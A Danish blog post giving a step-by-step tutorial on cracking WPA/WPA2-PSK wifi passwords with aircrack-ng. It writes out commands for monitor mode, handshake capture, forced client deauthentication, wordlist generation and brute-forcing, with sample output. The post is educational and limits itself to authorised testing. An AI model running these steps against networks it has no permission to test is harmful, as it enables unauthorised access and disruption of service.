Nighthawk.dk

Wifi-hacking med aircrack-ng

Skrevet d. 15. July 2022 af Claus Nielsen.

Et access point der anvender WPA/WPA2 med PSK kan hackes vha. aircrack-ng-værktøjerne, hvis der er brugt et svagt password.

Her er en hurtig guide til wifi-hacking med disse værktøjer, som bl.a. findes i Kali Linux.
Du bør kun prøve dette på dine egne access points, eller hvis du har fået lov af ejeren af det access point du forsøger at hacke.

Bemærk: Selvom der her fokuseres på WPA/WPA2 med PSK, kan aircrack-ng-værktøjerne også bruges til f.eks. WEP.

Før du går i gang, skal du sætte dit wifi-interface i monitor-mode. Dette gør du med:

airmon-ng start wlan0

Her er wlan0 navnet på wifi-interfacet (brug iwconfig eller ifconfig for at finde navnet på dit interface).

Dernæst køres airodump-ng wlan0 for at se tilgængelige access points (APs), samt hvilken kanal de kører på (channel 1-14). Det fremgår også hvilket BSSID hvert AP har.

Når du kender BSSID på det AP du vil hacke, køres:

airodump-ng -c 5 --bssid AA:BB:CC:DD:EE:FF -w psk wlan0

Dette vil optage data fra et AP med BSSID AA:BB:CC:DD:EE:FF, som kører på kanal 5 (-c 5). Output skrives til en række filer med præfiks psk (angivet ved -w psk).

Nu er det blot et spørgsmål om at vente på, at nogen forbinder til AP'et. Når det sker, ser det nogenlunde således ud:

21:08:39  Created capture file "psk-01.cap".

 CH  5 ][ Elapsed: 30 s ][ 2022-06-12 21:09 ][ WPA handshake: AA:BB:CC:DD:EE:FF

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

 AA:BB:CC:DD:EE:FF  -48 100      310    10114  312   5  130   WPA2 CCMP   PSK  TestAP

 ...

Den markerede del med WPA handshake bliver vist så snart et handshake er opfanget.

Hvis du ikke vil vente på at nogen forbinder til AP'et, kan du evt. tvinge en klient til at afbryde forbindelsen til AP'et - for derefter sandsynligvis at forsøge at forbinde igen. Dette kan gøres med:

aireplay-ng --deauth 100 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0

Her er 11:22:33:44:55:66 klientens MAC-adresse (læs mere her).

Nu er data indsamlet, og du kan bruge aircrack-ng til at finde passwordet:

aircrack-ng -w wordlist.lst -b AA:BB:CC:DD:EE:FF psk*.cap

Kali Linux indeholder en del wordlists, men lad os i dette tilfælde sige at vi ved, at koden består af 8 tegn, som alle er tal. Vi kan i dette tilfælde lave en wordlist således:

python -c 'for i in range(0, 100000000): print("%08d" % (i,))' > wordlist.lst

Når aircrack-ng køres, får vi så:

                               Aircrack-ng 1.6

      [00:21:24] 7425779/100000000 keys tested (5878.41 k/s)

      Time left: 4 hours, 20 minutes, 28 seconds                 7.43%

                           KEY FOUND! [ 07196562 ]

...

Det fundne password til AP'et er altså i dette tilfælde 07196562.

Du kan lære mere om aircrack-ng her.

Emner
Relaterede ressourcer
Aircrack-ng

Se mere her

Linux Basics for Hackers

OccupyTheWeb,
No Starch Press, 2019

×